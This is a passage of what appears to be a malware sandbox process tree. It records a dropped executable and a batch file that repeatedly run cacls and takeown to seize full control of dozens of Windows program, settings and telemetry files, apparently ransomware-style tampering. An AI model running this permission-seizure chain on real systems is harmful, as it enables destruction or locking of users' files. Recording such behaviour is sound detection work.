-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:4328
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4564
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵PID:2564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:4112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵
- Modifies file permissions
PID:4360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵PID:5028
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵
- Executes dropped EXE
PID:4132
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:4932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:5072
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:908
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:4172
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:4188
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "WinMail.exe" -nobanner3⤵PID:3848
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "WinMail.exe" -nobanner4⤵
- Executes dropped EXE
PID:4788
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:4296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:4588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1780
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:5060
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4316
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:5108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:4884
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4512
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:4860
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:4460
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4704
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:340
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4128
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:4484
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:3972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:5084
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:4352
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:5068
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:4476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2476
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "wab.exe" -nobanner3⤵PID:4580
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "wab.exe" -nobanner4⤵PID:5124
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:5184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:5268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
PID:5300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:5324
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:5344
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:5516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:5568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
PID:5588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:5616
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:5636
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5660
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:5680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:5736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:5756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "settings.dat" -nobanner3⤵PID:5808
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "settings.dat" -nobanner4⤵PID:5824
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""2⤵PID:5880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C3⤵PID:5928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"3⤵
- Modifies file permissions
PID:5948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "vedatamodel.edb" -nobanner3⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "vedatamodel.edb" -nobanner4⤵PID:5984
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:6036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:6084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:6104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "settings.dat" -nobanner3⤵PID:6124
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "settings.dat" -nobanner4⤵PID:6140
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5152
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""2⤵PID:5160
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C3⤵PID:5192
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"3⤵
- Modifies file permissions
PID:5272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "device.png" -nobanner3⤵PID:5332
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "device.png" -nobanner4⤵PID:5364
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json""2⤵PID:5188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" /E /G Admin:F /C3⤵PID:256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json"3⤵
- Modifies file permissions
PID:264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "utc.app.json" -nobanner3⤵PID:2884
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "utc.app.json" -nobanner4⤵PID:5404
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs""2⤵PID:5576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs" /E /G Admin:F /C3⤵PID:5656
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edbres00002.jrs"3⤵
- Modifies file permissions
PID:5668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "edbres00002.jrs" -nobanner3⤵PID:5564
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "edbres00002.jrs" -nobanner4⤵PID:5544
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5696
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:5724
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:5816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
PID:5828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "superbar.png" -nobanner3⤵PID:5860
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "superbar.png" -nobanner4⤵PID:5732
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5700
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json""2⤵PID:5848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" /E /G Admin:F /C3⤵PID:5936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json"3⤵
- Modifies file permissions
PID:5952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "utc.cert.json" -nobanner3⤵PID:5996
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "utc.cert.json" -nobanner4⤵PID:6004
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:5912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:6108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Storage Health\StorageHealthModel.dat"3⤵
- Modifies file permissions
PID:5012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:5112
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm""2⤵PID:6060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm" /E /G Admin:F /C3⤵PID:5200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.jfm"3⤵
- Modifies file permissions
PID:5304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "vedatamodel.jfm" -nobanner3⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "vedatamodel.jfm" -nobanner4⤵PID:5384
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:4448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:4212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
- Modifies file permissions
PID:4152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "overlay.png" -nobanner3⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "overlay.png" -nobanner4⤵PID:248
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""2⤵PID:5640
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C3⤵PID:5528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"3⤵
- Modifies file permissions
PID:5612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner3⤵PID:5572
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner4⤵PID:5580
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""2⤵PID:5872
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C3⤵PID:5692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"3⤵
- Modifies file permissions
PID:5720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "osver.txt" -nobanner3⤵PID:4912
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "osver.txt" -nobanner4⤵PID:5932
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk""2⤵PID:6000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk" /E /G Admin:F /C3⤵PID:4728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\edb.chk"3⤵
- Modifies file permissions
PID:6116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "edb.chk" -nobanner3⤵PID:5116
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "edb.chk" -nobanner4⤵PID:5140
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl""2⤵PID:6120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl" /E /G Admin:F /C3⤵PID:5308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\AutoLogger-Diagtrack-Listener.etl"3⤵PID:5356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner3⤵PID:5240
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "AutoLogger-Diagtrack-Listener.etl" -nobanner4⤵PID:5360
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm""2⤵PID:4368
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm" /E /G Admin:F /C3⤵PID:5400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.jfm"3⤵
- Modifies file permissions
PID:3756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c PsYzXFib.exe -accepteula "qmgr.jfm" -nobanner3⤵PID:5596
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula "qmgr.jfm" -nobanner4⤵PID:276
-
-
-
C:\Users\Admin\AppData\Local\Temp\PsYzXFib.exePsYzXFib.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\isf6ysf5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:5752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:5832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵
- Modifies file permissions
PID:5820
-
-
